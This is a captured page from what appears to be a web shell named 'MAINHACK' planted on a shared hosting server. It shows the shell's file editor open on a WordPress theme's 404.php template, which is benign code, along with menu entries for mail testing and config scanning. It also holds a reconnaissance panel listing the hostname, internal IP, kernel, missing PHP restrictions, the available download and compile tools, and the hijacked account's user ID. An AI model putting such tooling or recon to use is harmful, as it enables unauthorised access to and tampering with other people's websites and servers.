[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 404.php
<?php /** * The template for displaying 404 pages (not found) * * @link https://codex.wordpress.org/Creating_an_Error_404_Page * * @package Shopper */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <div class="error-404 not-found"> <div class="page-content"> <header class="page-header"> <h1 class="page-title"><?php esc_html_e( 'Oops! That page can’t be found.', 'shopper' ); ?></h1> </header><!-- .page-header --> <p><?php esc_html_e( 'Nothing was found at this location. Please check your URL or use the search form below.', 'shopper' ); ?></p> <?php echo '<section aria-label="Search">'; if ( shopper_is_woocommerce_activated() ) { the_widget( 'WC_Widget_Product_Search' ); } else { get_search_form(); } echo '</section>'; if ( shopper_is_woocommerce_activated() ) { echo '<div class="fourohfour-columns-2">'; echo '<section class="col-1" aria-label="Promoted Products">'; shopper_promoted_products(); echo '</section>'; echo '<nav class="col-2" aria-label="Product Categories">'; echo '<h2 class="widget-title">' . esc_html__( 'Product Categories', 'shopper' ) . '</h2>'; the_widget( 'WC_Widget_Product_Categories', array() ); echo '</nav>'; echo '</div>'; echo '<section aria-label="Popular Products" >'; echo '<h2 class="widget-title">' . esc_html__( 'Popular Products', 'shopper' ) . '</h2>'; echo shopper_do_shortcode( 'best_selling_products', array( 'per_page' => 4, 'columns' => 4, ) ); echo '</section>'; } ?> </div><!-- .page-content --> </div><!-- .error-404 --> </main><!-- #main --> </div><!-- #primary --> <?php get_footer();
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.89 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619